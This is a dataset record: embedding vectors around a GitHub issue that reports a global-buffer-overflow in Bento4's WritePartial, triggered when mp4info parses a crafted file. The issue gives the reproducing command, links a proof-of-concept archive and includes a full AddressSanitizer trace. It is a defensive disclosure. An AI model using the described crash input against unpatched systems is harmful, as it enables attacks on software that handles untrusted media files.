-0.0075571173802018166, 0.01563851535320282, 0.0055236611515283585, 0.03744855150580406, 0.002462242264300585, 0.0012610799167305231, -0.01779555156826973, 0.009384606964886189, -0.012897280976176262, -0.009032590314745903, -0.01673201285302639, 0.007826747372746468, 0.0016561622032895684, 0.015743371099233627, 0.010740244761109352, -0.012927239760756493, 0.003501439467072487, 0.0038572007324546576, -0.02107604406774044, -0.016911765560507774, 0.011721396818757057, 0.004621151369065046, -0.010328310541808605, 0.0013631272595375776, 0.007235059980303049, -0.012178268283605576, -0.02091127075254917, -0.018349789083003998, -0.007879175245761871, 0.0003777622478082776, -0.0034827152267098427, -0.024116866290569305, 0.002906007459387183, 0.011316952295601368, 0.0245512705296278, -0.023697443306446075, 0.005587323568761349, 0.02577958256006241, -0.034872088581323624, -0.029015136882662773, -0.010687815956771374, 0.0008102930150926113, -0.014440161176025867, 0.005063043907284737, 0.024281639605760574, 0.006871809251606464, -0.004359011072665453, 0.0035988057497888803, 0.005752097349613905, -0.0016599070513620973, -0.0028498347382992506, 0.009789051488041878, 0.0007812703843228519, -0.01611785590648651, -0.009721643291413784, -0.003705534152686596, -0.0184995848685503, -0.003782303538173437, 0.0077518499456346035, 0.008006500080227852, 0.011624029837548733, 0.009407076053321362, -0.01995258778333664, -0.021600324660539627, -0.0072725084610283375, -0.024731023237109184, -0.007287487853318453, 0.0031475506257265806, 0.006444895640015602, -0.015031848102807999, -0.0005888784653507173, -0.013294235803186893, 0.012432918883860111, 0.0017404214013367891, 0.011077281087636948, -0.006426171399652958, 0.02979406714439392, -0.0020596703980118036, 0.0058869123458862305, 0.011736376211047173, -0.0016786312917247415, 0.03508180379867554, 0.023412832990288734, -0.020746497437357903, -0.007602055557072163, -0.02735242061316967, 0.007223825436085463, 0.01206592284142971, 0.002318065380677581, -0.015743371099233627, -0.012185757979750633, -0.038916535675525665, 0.006785677280277014, 0.002982777077704668, -0.03439274802803993, -0.006501068361103535, -0.011324441991746426, 0.0017928493907675147, -0.012118350714445114, 0.02188493311405182, 0.0008444648119620979, 0.018799172714352608, 0.010215964168310165, -0.022573987022042274, 0.009774072095751762, -0.004123085644096136, 0.007500944659113884, -0.004003250040113926, -0.027696948498487473, 0.020701559260487556, 0.016297608613967896, 0.004227941390126944, 0.01256773341447115, -0.007463496178388596, -0.038437191396951675, 0.01213333010673523, 0.002391089918091893, 0.026139087975025177, -0.003044567070901394, 0.008777940645813942, 0.014814646914601326, -0.002033456228673458, 0.012762466445565224, -0.0016065428499132395, 0.003304834710434079, -0.01837974786758423, -0.003031460102647543, -0.014582465402781963, 0.005654731299728155, 0.0070553068071603775, -0.024012010544538498, 0.0049506984651088715, -0.015533658675849438, -0.0058082700707018375, 0.006557241082191467, 0.004231686238199472, 0.01992262899875641, -0.021705180406570435, -0.01779555156826973, -0.015316457487642765, 0.01625267043709755, -0.000844932917971164, -0.018394727259874344, -0.009437034837901592, -0.0007077776244841516, 0.0014342794893309474, 0.011668968014419079, -0.014702300541102886, -0.0058644432574510574, -0.014342795126140118, 0.01515917293727398, -0.011331931687891483, -0.001726378221064806, -0.024596208706498146, 0.01462740357965231, -0.004051933065056801, -0.009129956364631653, -0.0019005138892680407, 0.01715143583714962, -0.013189379125833511, -0.01053802203387022, -0.018559502437710762, -0.030078675597906113, 0.014604934491217136, -0.01837974786758423, 0.002552118618041277, -0.005958064459264278, 0.01074773445725441, 0.018424686044454575, 0.011316952295601368, 0.026438677683472633, 0.011242055334150791, -0.013556375168263912, 0.021675221621990204, 0.02101612649857998, 0.02194485068321228, 0.001161841326393187, 0.010642877779901028, -0.00405567791312933, -0.017960324883461, 0.017436044290661812, 0.02275373972952366, 0.013017116114497185, 0.020746497437357903, 0.009586828760802746, 0.01084510050714016, 0.026363778859376907, -0.006954195909202099, 0.009661725722253323, 0.01024592388421297, 0.018125098198652267, -0.009661725722253323, 0.010852590203285217, 0.009886417537927628, 0.002100863726809621, 0.019323451444506645, 0.003580081509426236, -0.006044195964932442, -0.00542255025357008, -0.005995512939989567, -0.0026232709642499685, 0.008058927953243256, 0.010964935645461082, 0.00011076578812208027, -0.01676197163760662, 0.005752097349613905, 0.004785924684256315, -0.007223825436085463, 0.005250286776572466, 0.0046174065209925175, -0.0016954831080511212, 0.009699174202978611, -0.030453162267804146, 0.030093654990196228, 0.01034328993409872, 0.005609792657196522, -0.0099088866263628, -0.00811135582625866, -0.004793414380401373, 0.025824520736932755, 0.0038309867959469557, -0.029179910197854042, -0.017960324883461, -0.010987404733896255, 0.005815759766846895, -0.002024094108492136, -0.0036624681670218706, -0.002724382095038891, -0.0023667484056204557, 0.00140993797685951, -0.005347652826458216, 0.004546253941953182, -0.017900407314300537, 0.01866435818374157, 0.00034944177605211735, -0.0039208633825182915, 0.026184026151895523, 0.013811025768518448, -0.0018246805993840098, 0.010934976860880852, -0.00654975138604641, 0.030288387089967728, -0.008298599161207676, -0.020446909591555595, -0.006489833816885948, 0.000017700291209621355, -0.0015194748993963003, -0.025944355875253677, 0.00489078089594841, -0.007684442680329084, -0.0032917275093495846, 0.007939092814922333, 0.009631766937673092, -0.01109975017607212, 0.01911373995244503, -0.024536291137337685, 0.004991891793906689, 0.011624029837548733, 0.013346663676202297, 0.005197858903557062, 0.00997629389166832, -0.008560738526284695, 0.014215470291674137, 0.013863453641533852, 0.0026682091411203146, 0.0008514864020980895, 0.013376622460782528, -0.0005790482391603291, -0.0024004520382732153, -0.022349294275045395, -0.0060966238379478455, -0.014245429076254368, 0.011624029837548733, 0.022439170628786087, 0.007605800870805979, -0.02435653656721115, 0.010553001426160336, 0.011721396818757057, 0.011496705003082752, -0.009489462710916996, -0.030453162267804146, 0.0236225463449955, -0.014837116003036499, 0.0023611311335116625, 0.0004315945552662015, 0.003954567015171051, -0.002660719444975257, 0.004606171511113644, -0.02245415188372135, 0.008096376433968544, -0.0030483119189739227, 0.008103866130113602, 0.015368885360658169, 0.03265513479709625, 0.030393242835998535, -0.003546377643942833, -0.015563617460429668, 0.011369380168616772, 0.018709296360611916, -0.007886664941906929, -0.013631272129714489, -0.015473741106688976, 0.0004802776675205678, -0.00629884609952569, 0.0073174466378986835, 0.027816783636808395, 0.018454646691679955, 0.007358640432357788, -0.016372505575418472, -0.014837116003036499, 0.0036268921103328466, 0.003995760343968868, 0.013840984553098679, 0.023967072367668152, -0.003456501290202141, -0.014320326037704945, 0.005961809307336807, -0.005396336317062378, -0.003340410767123103, 0.008785430341959, 0.005325183738023043, -0.009339668788015842, 0.01911373995244503, 0.024835878983139992, -0.00867308396846056, 0.022289376705884933, 0.005838228855282068, -0.009144935756921768, -0.004875801503658295, 0.019937608391046524, 0.019068801775574684, 0.010815141722559929, 0.008860327303409576, -0.014829626306891441, -0.017466004937887192, 0.018604440614581108, 0.005860698409378529, 0.0073736198246479034, 0.009129956364631653, -0.005826994311064482, -0.020327072590589523, 0.008965183049440384, 0.0036362542305141687, 0.02336789481341839, 0.007085265591740608, 0.006489833816885948, -0.020327072590589523, 0.00030403543496504426, 0.01905382238328457, 0.028760487213730812, -0.0007985903648659587, -0.01084510050714016, 0.0029359664767980576, 0.010036211460828781, 0.0038796698208898306, -0.01147423591464758, 0.01740608550608158, 0.009302220307290554, -0.013743618503212929, 0.002231933642178774, -0.005879422649741173, 0.0002037435187958181, 0.012859832495450974, -0.007781808730214834, -0.005287735257297754, 0.013855963945388794, 0.010770203545689583, -0.015024358406662941, -0.0003372710198163986, 0.0021907403133809566, -0.009354648180305958, -0.0035856987815350294, 0.00592061597853899, 0.00804394856095314, 0.0067220148630440235, -0.010283372364938259, 0.014747239649295807, -0.01496444083750248, 0.011024853214621544, -0.014792177826166153, -0.0018742999527603388, 0.002363003557547927, 0.003679320216178894, -0.0027281269431114197, -0.025824520736932755, -0.01837974786758423, 0.019652999937534332, -0.014425181783735752, 0.0027037854306399822, -0.02107604406774044, -0.0022487854585051537, -0.015848226845264435, -0.002471604384481907, 0.015368885360658169, 0.004452632740139961, -0.0056697106920182705, -0.0012367384042590857, -0.020297113806009293, 0.0044451430439949036, 0.010013742372393608, 0.014395222999155521, 0.009886417537927628, 0.011242055334150791, -0.009407076053321362, 0.0019529418786987662, -0.018784193322062492, -0.0018640016205608845, 0.015563617460429668, 0.00130133714992553, 0.016492342576384544, 0.002552118618041277, -0.002218826673924923, 0.006590944714844227, 0.005370122380554676, 0.007006623782217503, 0.009152425453066826, -0.012260655872523785, -0.010478104464709759, 0.004261645022779703, 0.004329052288085222, -0.012088391929864883, -0.0056921797804534435, -0.01827489212155342, -0.0064598750323057175, 0.009055059403181076, -0.001672077807597816, -0.0019323452142998576, -0.008845347911119461, 0.033224355429410934, -0.010290862061083317, 0.0055910684168338776, 0.012657609768211842, 0.009534400887787342, 0.013106992468237877, -0.01589316502213478, -0.014912012964487076, 0.004314072895795107, -0.017975304275751114, 0.002295596059411764, -0.0093471584841609, -0.006957940757274628, -0.04083389788866043, -0.017615798860788345, 0.01094246655702591, 0.0025184149853885174, -0.006175266113132238, -0.00018291275773663074, 0.005755842197686434, -0.016387484967708588, 0.012889791280031204, 0.013039585202932358, 0.017391106113791466, 0.008598187007009983, -0.010088639333844185, 0.007437282241880894, 0.007500944659113884, 0.018065180629491806, 0.012852342799305916, -0.0028666865546256304, 0.007407323457300663, -0.00613781763240695, 0.013990778475999832, 0.014477609656751156, -0.00673324940726161, -0.014065675437450409, -0.0022356784902513027, -0.029629293829202652, -0.022484110668301582, 0.011272014118731022, 0.015256539918482304, 0.03040822222828865, 0.009983783587813377, -0.009661725722253323, 0.001043878379277885, -0.013136951252818108, 0.022469131276011467, 0.0039433324709534645, 0.011092260479927063, -0.010111108422279358, 0.017480984330177307, -0.009392096661031246, -0.0006066664936952293, -0.006040451116859913, 0.05434533581137657, 0.0050667887553572655, 0.027696948498487473, 0.008905265480279922, 0.0065759653225541115, -0.005572344176471233, 0.0013163165422156453, -0.0026588470209389925, 0.004280369263142347, -0.0021495467517524958, -0.008028969168663025, 0.005797035526484251, 0.012979667633771896, -0.007426047697663307, -0.0029659252613782883, 0.005553619936108589, 0.006778187584131956, -0.0026401227805763483, -0.007594565860927105, -0.01978781446814537, -0.02452131174504757, 0.0005490893963724375, 0.027052832767367363, -0.013406581245362759, -0.0074410270899534225, -0.0029078798834234476, 0.014485099352896214, -0.011796293780207634, 0.006197735201567411, 0.00010397824371466413, 0.030977440997958183, -0.009819010272622108, -0.014035716652870178, -0.006560985930263996, 0.0005186624475754797, 0.016627157106995583, -0.000872083124704659, 0.016806909814476967, 0.012013494968414307, 0.007886664941906929, -0.00035763366031460464, 0.012919750064611435, -0.01599802076816559, 0.003668085439130664, -0.0026176536921411753, 0.009759092703461647, -0.012410449795424938, 0.003731748089194298, 0.016462383791804314, 0.007909134030342102, 0.003645616350695491, 0.0007915687165223062, -0.012717528268694878, 0.0038160074036568403, -0.012754976749420166, 0.011047322303056717, 0.0028723038267344236, -0.027622051537036896, -0.01119711622595787, -0.005459998734295368, -0.01676197163760662, -0.006497323513031006, -0.0064598750323057175, -0.011946087703108788, -0.019458267837762833, -0.00020491378381848335, 0.014754729345440865, 0.01995258778333664, -0.006227693986147642, 0.027052832767367363, 0.004935719072818756, 0.004366501234471798, -0.02760707214474678, 0.005613537970930338, -0.0126650994643569, -0.010994894430041313, 0.023053327575325966, 0.006905512884259224, 0.01336913276463747, -0.0003627828264143318, 0.003104484872892499, -0.0067969118244946, 0.025105508044362068, -0.0041605341248214245, 0.003284237813204527, -0.010298351757228374, -0.003999505192041397, -0.01509176567196846, -0.022289376705884933, 0.013264277018606663, 0.018170036375522614, 0.004916994832456112, -0.014387733303010464, -0.007954072207212448, 0.01259769219905138, -0.0013303597224876285, -0.0029977564699947834, -0.016162794083356857, 0.0024884562008082867, 0.0014352157013490796, 0.03124707005918026, 0.014178020879626274, -0.019233575090765953, 0.007092755287885666, 0.022603945806622505, 0.0012301849201321602, 0.008658104576170444, -0.007643249351531267, -0.004920739680528641, 0.011339421384036541, 0.02706781215965748, -0.01327176671475172, -0.016582218930125237, 0.01369118969887495, 0.015908144414424896, 0.008336047641932964, -0.007493454962968826, 0.0025689706671983004, 0.013818515464663506, 0.009047569707036018, -0.014545016922056675, -0.021450530737638474, 0.03217579424381256, 0.013346663676202297, 0.012867322191596031, -0.003868435276672244, -0.009025100618600845, 0.023023368790745735, 0.010058680549263954, 0.004044443368911743, -0.013848474249243736, -0.017361147329211235, 0.017226332798600197, 0.0023648759815841913, -0.008515800349414349, 0.009616787545382977, -0.014747239649295807, 0.037178922444581985, 0.011991025879979134, 0.006403702311217785, -0.006014237180352211, 0.062254469841718674, -0.01174386590719223, 0.001157160266302526, -0.01409563422203064, 0.02589941769838333, -0.011586581356823444, 0.021450530737638474, -0.025929376482963562, -0.0063662538304924965, -0.0007204164867289364, 0.02158534526824951, 0.01734616793692112, 0.000050028924306388944, -0.00867308396846056, -0.0047709452919662, 0.002282489091157913, 0.004688558634370565, 0.006531027145683765, -0.017870448529720306, 0.014005757868289948, 0.004568723030388355, 0.001518538687378168, 0.015818268060684204, 0.00045663825585506856, 0.0024828389286994934, 0.001844341168180108, -0.006182755809277296, 0.020476868376135826, 0.006972920149564743, -0.03376361355185509, -0.00779678812250495, 0.0018602567724883556, -0.012522795237600803, 0.009122466668486595, 0.020611682906746864, 0.014852095395326614, -0.003692427184432745, 0.004684813786298037, 0.010253413580358028, 0.013114482164382935, 0.0022338060662150383, -0.01824493333697319, 0.01740608550608158, 0.047604598104953766, -0.0022300612181425095, -0.0014286622172221541, -0.012178268283605576, 0.010949956253170967, -0.01017102599143982, 0.013908391818404198, -0.008995141834020615, 0.005074278451502323, 0.003452756442129612, -0.0059805335476994514, 0.01506180688738823, 0.0008641253225505352, 0.01679193042218685, 0.021405590698122978, -0.0012002260191366076, -0.0023049581795930862, -0.021120982244610786, -0.00014171935617923737, -0.0017188885249197483 ]
230
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
Hi, there. There is an infinite loop fault caused by buffer overflow in in WritePartial, Ap4ByteStream.cpp:785, in the newest master branch 5922ba762a. Here is the reproducing command: ~~~~ mp4info poc ~~~~ POC: [poc.zip](https://github.com/axiomatic-systems/Bento4/files/7014583/mp42aac-overflow-WritePartial785.zip) (unzip first) Here is the reproduce trace reported by ASAN: ~~~~ ==135555==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000012f2ac1 at pc 0x0000004ae555 bp 0x7ffe5ff9acb0 sp 0x7ffe5ff9a460 READ of size 248 at 0x0000012f2ac1 thread T0 #0 0x4ae554 in __asan_memcpy /dependence/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22 #1 0x555016 in AP4_MemoryByteStream::WritePartial(void const*, unsigned int, unsigned int&) /mnt/data/playground/Bento4/Source/C++/Core/Ap4ByteStream.cpp:785:5 #2 0x54f4a9 in AP4_ByteStream::Write(void const*, unsigned int) /mnt/data/playground/Bento4/Source/C++/Core/Ap4ByteStream.cpp:77:29 #3 0x58be0d in AP4_HdlrAtom::WriteFields(AP4_ByteStream&) /mnt/data/playground/Bento4/Source/C++/Core/Ap4HdlrAtom.cpp:141:29 #4 0x52be01 in AP4_Atom::Write(AP4_ByteStream&) /mnt/data/playground/Bento4/Source/C++/Core/Ap4Atom.cpp:229:14 #5 0x52c854 in AP4_Atom::Clone() /mnt/data/playground/Bento4/Source/C++/Core/Ap4Atom.cpp:316:9 #6 0x55a9ec in AP4_ContainerAtom::Clone() /mnt/data/playground/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:172:56 #7 0x55a9ec in AP4_ContainerAtom::Clone() /mnt/data/playground/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:172:56 #8 0x55a9ec in AP4_ContainerAtom::Clone() /mnt/data/playground/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:172:56 #9 0x60732b in AP4_SampleDescription::AP4_SampleDescription(AP4_SampleDescription::Type, unsigned int, AP4_AtomParent*) /mnt/data/playground/Bento4/Source/C++/Core/Ap4SampleDescription.cpp:135:41 #10 0x60a592 in AP4_AvcSampleDescription::AP4_AvcSampleDescription(unsigned int, unsigned short, unsigned short, unsigned short, char const*, AP4_AtomParent*) /mnt/data/playground/Bento4/Source/C++/Core/Ap4SampleDescription.cpp:380:5 #11 0x622279 in AP4_AvcSampleEntry::ToSampleDescription() /mnt/data/playground/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:1146:16 #12 0x63fba4 in AP4_StsdAtom::GetSampleDescription(unsigned int) /mnt/data/playground/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:181:53 #13 0x6a479e in AP4_AtomSampleTable::GetSampleDescription(unsigned int) /mnt/data/playground/Bento4/Source/C++/Core/Ap4AtomSampleTable.cpp:207:37 #14 0x66004d in AP4_Track::GetSampleDescription(unsigned int) /mnt/data/playground/Bento4/Source/C++/Core/Ap4Track.cpp:447:43 #15 0x4fce5e in ShowTrackInfo_Text(AP4_Movie&, AP4_Track&, AP4_ByteStream&, bool, bool, bool, bool) /mnt/data/playground/Bento4/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1351:52 #16 0x4fce5e in ShowTrackInfo(AP4_Movie&, AP4_Track&, AP4_ByteStream&, bool, bool, bool, bool) /mnt/data/playground/Bento4/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1475:13 #17 0x4fbed0 in ShowTracks(AP4_Movie&, AP4_List<AP4_Track>&, AP4_ByteStream&, bool, bool, bool, bool) /mnt/data/playground/Bento4/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1586:9 #18 0x4f7ca0 in main /mnt/data/playground/Bento4/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1868:13 #19 0x7efeb30e583f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 #20 0x41c1f8 in _start (/mnt/data/playground/Bento4/build/mp4info+0x41c1f8) 0x0000012f2ac1 is located 63 bytes to the left of global variable 'AP4_GlobalOptions::g_Entries' defined in '/mnt/data/playground/Bento4/Source/C++/Core/Ap4Utils.cpp:38:56' (0x12f2b00) of size 8 0x0000012f2ac1 is located 0 bytes to the right of global variable 'AP4_String::EmptyString' defined in '/mnt/data/playground/Bento4/Source/C++/Core/Ap4String.cpp:39:18' (0x12f2ac0) of size 1 'AP4_String::EmptyString' is ascii string '' SUMMARY: AddressSanitizer: global-buffer-overflow /dependence/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22 in __asan_memcpy Shadow bytes around the buggy address: 0x000080256500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080256510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080256520: 00 00 00 00 00 00 00 00 04 f9 f9 f9 f9 f9 f9 f9 0x000080256530: 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 0x000080256540: 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 =>0x000080256550: 00 00 f9 f9 f9 f9 f9 f9[01]f9 f9 f9 f9 f9 f9 f9 0x000080256560: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 0x000080256570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080256580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080256590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000802565a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==135555==ABORTING Aborted ~~~~
Infinite loop caused by buffer overflow, in WritePartial, Ap4ByteStream.cpp:785
https://api.github.com/repos/axiomatic-systems/Bento4/issues/641/comments
0
2021-08-19T13:07:50
2021-08-19T13:12:18Z
https://github.com/axiomatic-systems/Bento4/issues/641
974,645,363
641
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : Infinite loop caused by buffer overflow, in WritePartial, Ap4ByteStream.cpp:785 Issue date: --- start body --- Hi, there. There is an infinite loop fault caused by buffer overflow in in WritePartial, Ap4ByteStream.cpp:785, in the newest master branch 5922ba762a. Here is the reproducing command: ~~~~ mp4info poc ~~~~ POC: [poc.zip](https://github.com/axiomatic-systems/Bento4/files/7014583/mp42aac-overflow-WritePartial785.zip) (unzip first) Here is the reproduce trace reported by ASAN: ~~~~ ==135555==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000012f2ac1 at pc 0x0000004ae555 bp 0x7ffe5ff9acb0 sp 0x7ffe5ff9a460 READ of size 248 at 0x0000012f2ac1 thread T0 #0 0x4ae554 in __asan_memcpy /dependence/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22 #1 0x555016 in AP4_MemoryByteStream::WritePartial(void const*, unsigned int, unsigned int&) /mnt/data/playground/Bento4/Source/C++/Core/Ap4ByteStream.cpp:785:5 #2 0x54f4a9 in AP4_ByteStream::Write(void const*, unsigned int) /mnt/data/playground/Bento4/Source/C++/Core/Ap4ByteStream.cpp:77:29 #3 0x58be0d in AP4_HdlrAtom::WriteFields(AP4_ByteStream&) /mnt/data/playground/Bento4/Source/C++/Core/Ap4HdlrAtom.cpp:141:29 #4 0x52be01 in AP4_Atom::Write(AP4_ByteStream&) /mnt/data/playground/Bento4/Source/C++/Core/Ap4Atom.cpp:229:14 #5 0x52c854 in AP4_Atom::Clone() /mnt/data/playground/Bento4/Source/C++/Core/Ap4Atom.cpp:316:9 #6 0x55a9ec in AP4_ContainerAtom::Clone() /mnt/data/playground/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:172:56 #7 0x55a9ec in AP4_ContainerAtom::Clone() /mnt/data/playground/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:172:56 #8 0x55a9ec in AP4_ContainerAtom::Clone() /mnt/data/playground/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:172:56 #9 0x60732b in AP4_SampleDescription::AP4_SampleDescription(AP4_SampleDescription::Type, unsigned int, AP4_AtomParent*) /mnt/data/playground/Bento4/Source/C++/Core/Ap4SampleDescription.cpp:135:41 #10 0x60a592 in AP4_AvcSampleDescription::AP4_AvcSampleDescription(unsigned int, unsigned short, unsigned short, unsigned short, char const*, AP4_AtomParent*) /mnt/data/playground/Bento4/Source/C++/Core/Ap4SampleDescription.cpp:380:5 #11 0x622279 in AP4_AvcSampleEntry::ToSampleDescription() /mnt/data/playground/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:1146:16 #12 0x63fba4 in AP4_StsdAtom::GetSampleDescription(unsigned int) /mnt/data/playground/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:181:53 #13 0x6a479e in AP4_AtomSampleTable::GetSampleDescription(unsigned int) /mnt/data/playground/Bento4/Source/C++/Core/Ap4AtomSampleTable.cpp:207:37 #14 0x66004d in AP4_Track::GetSampleDescription(unsigned int) /mnt/data/playground/Bento4/Source/C++/Core/Ap4Track.cpp:447:43 #15 0x4fce5e in ShowTrackInfo_Text(AP4_Movie&, AP4_Track&, AP4_ByteStream&, bool, bool, bool, bool) /mnt/data/playground/Bento4/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1351:52 #16 0x4fce5e in ShowTrackInfo(AP4_Movie&, AP4_Track&, AP4_ByteStream&, bool, bool, bool, bool) /mnt/data/playground/Bento4/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1475:13 #17 0x4fbed0 in ShowTracks(AP4_Movie&, AP4_List<AP4_Track>&, AP4_ByteStream&, bool, bool, bool, bool) /mnt/data/playground/Bento4/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1586:9 #18 0x4f7ca0 in main /mnt/data/playground/Bento4/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1868:13 #19 0x7efeb30e583f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 #20 0x41c1f8 in _start (/mnt/data/playground/Bento4/build/mp4info+0x41c1f8) 0x0000012f2ac1 is located 63 bytes to the left of global variable 'AP4_GlobalOptions::g_Entries' defined in '/mnt/data/playground/Bento4/Source/C++/Core/Ap4Utils.cpp:38:56' (0x12f2b00) of size 8 0x0000012f2ac1 is located 0 bytes to the right of global variable 'AP4_String::EmptyString' defined in '/mnt/data/playground/Bento4/Source/C++/Core/Ap4String.cpp:39:18' (0x12f2ac0) of size 1 'AP4_String::EmptyString' is ascii string '' SUMMARY: AddressSanitizer: global-buffer-overflow /dependence/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22 in __asan_memcpy Shadow bytes around the buggy address: 0x000080256500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080256510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080256520: 00 00 00 00 00 00 00 00 04 f9 f9 f9 f9 f9 f9 f9 0x000080256530: 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 0x000080256540: 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 =>0x000080256550: 00 00 f9 f9 f9 f9 f9 f9[01]f9 f9 f9 f9 f9 f9 f9 0x000080256560: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 0x000080256570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080256580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080256590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000802565a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==135555==ABORTING Aborted ~~~~ --- end body ---
5,798
[ -0.04077684506773949, 0.01957923173904419, -0.013129509054124355, 0.02253039740025997, 0.04350587725639343, 0.004047934897243977, -0.03503318130970001, 0.042934685945510864, -0.030178038403391838, 0.035667840391397476, -0.012312386184930801, 0.030622299760580063, 0.027020609006285667, 0.011780858971178532, 0.01110653392970562, 0.003817870980128646, -0.02257799543440342, -0.009400887414813042, -0.01091613620519638, 0.013542037457227707, 0.041316304355859756, -0.010249744169414043, -0.024608904495835304, 0.05886462703347206, -0.012629715725779533, 0.020134558901190758, -0.028258195146918297, -0.01480342261493206, 0.011043068021535873, -0.008044303394854069, 0.0003805475134868175, 0.01726272702217102, -0.009147023782134056, 0.007596075534820557, 0.04191923141479492, 0.014819289557635784, 0.0511535219848156, 0.061244599521160126, 0.004914640914648771, 0.03281187266111374, 0.0045576454140245914, -0.04712343588471413, -0.025783024728298187, 0.03133629262447357, -0.005533433519303799, 0.025846490636467934, 0.008488564752042294, -0.004978106822818518, -0.03592170402407646, 0.011812591925263405, 0.012962911278009415, -0.0003832745715044439, -0.047155167907476425, -0.06146673113107681, -0.0033775761257857084, -0.025338763371109962, 0.01314537599682808, 0.02483103610575199, -0.005703998263925314, 0.004466413054615259, -0.007036782335489988, 0.008000670932233334, 0.006897950544953346, 0.033034004271030426, -0.012962911278009415, -0.013089843094348907, -0.027750467881560326, 0.03192334994673729, -0.04195096343755722, 0.03642943128943443, -0.0308602973818779, -0.023926647379994392, 0.016342470422387123, 0.05216897651553154, 0.0028361326549202204, -0.027274472638964653, 0.013827634043991566, 0.0334782674908638, -0.01436709426343441, 0.04264909029006958, -0.050487127155065536, 0.021118279546499252, -0.04623491317033768, 0.024545438587665558, -0.0035025246907025576, 0.025291163474321365, -0.03404945880174637, -0.08123636245727539, -0.02838512696325779, -0.04214136302471161, 0.018436845391988754, 0.014787556603550911, 0.012510716915130615, 0.007588142529129982, 0.009853081777691841, 0.031098295003175735, -0.01635833829641342, -0.012074388563632965, -0.06432269513607025, -0.03423985838890076, -0.030035240575671196, -0.025243563577532768, 0.017706988379359245, 0.004978106822818518, 0.009504019282758236, -0.009789615869522095, 0.002411704510450363, -0.027417272329330444, 0.022102002054452896, 0.12001402676105499, 0.009734082967042923, -0.00709231523796916, -0.013534104451537132, 0.020927881821990013, -0.0011285031214356422, 0.010186278261244297, 0.005723831243813038, -0.01832578144967556, -0.037984345108270645, -0.01637420430779457, -0.010384608991444111, -0.01938883401453495, -0.012129921466112137, 0.015136619098484516, -0.019499899819493294, 0.03417639061808586, -0.006227592006325722, -0.017151661217212677, -0.019610965624451637, -0.024402640759944916, -0.020324956625699997, -0.044330935925245285, -0.010559139773249626, -0.024069445207715034, 0.00003817871038336307, 0.013518238440155983, -0.0369688905775547, 0.0404912494122982, 0.030003506690263748, 0.01023387722671032, -0.055596135556697845, -0.02697301097214222, 0.03687369078397751, 0.005866629537194967, -0.012558315880596638, -0.007941171526908875, -0.0029809141997247934, 0.0006044135661795735, -0.029876574873924255, 0.000985209015198052, 0.0009043891914188862, -0.0273379385471344, 0.018944572657346725, 0.02979724295437336, 0.0369688905775547, -0.010083145461976528, 0.03211374953389168, 0.01956336572766304, -0.008901093155145645, -0.002655651420354843, -0.021038947626948357, -0.04261735454201698, 0.01745312474668026, -0.015842676162719727, -0.016675667837262154, 